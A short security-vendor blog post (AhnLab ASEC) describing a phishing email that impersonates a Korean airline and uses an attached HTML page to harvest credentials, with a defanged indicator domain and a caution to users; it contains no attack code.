Phishing Email Disguised as a Well-Known Korean Airline

The ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean airline to collect user credentials. The phishing email contains a notice on airline ticket payment, inducing the reader to connect to the disguised phishing page with specific ticket prices and details that implies that the sender has background information of the reader.

The subject and the body of the email are shown below.

Figure 1. Subject and body of the email

When the attached HTML file is opened, a connection is made to a phishing page disguised as one of Korea’s well-known airlines.

Figure 2. Phishing page

The page disguises its source as the airline’s management support team and requires the victim to enter their account credentials and print the plane ticket in PDF.

Figure 3. A part of the phishing site’s HTML code

When the user enters the password and clicks ‘View statement,’ the account credentials collected from the page are sent to the attacker’s server.

Figure 4. Sending account credentials

To prevent damage from such phishing emails that are distributed under an elaborate disguise, users need to take extra caution when they view files attached to emails from unknown sources.

AhnLab currently blocks the domain related to this phishing page.

[IOC Info]

  • hxxps://ocostelaosantos[.]

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 1 vote
Article Rating
Notify of

Inline Feedbacks
View all comments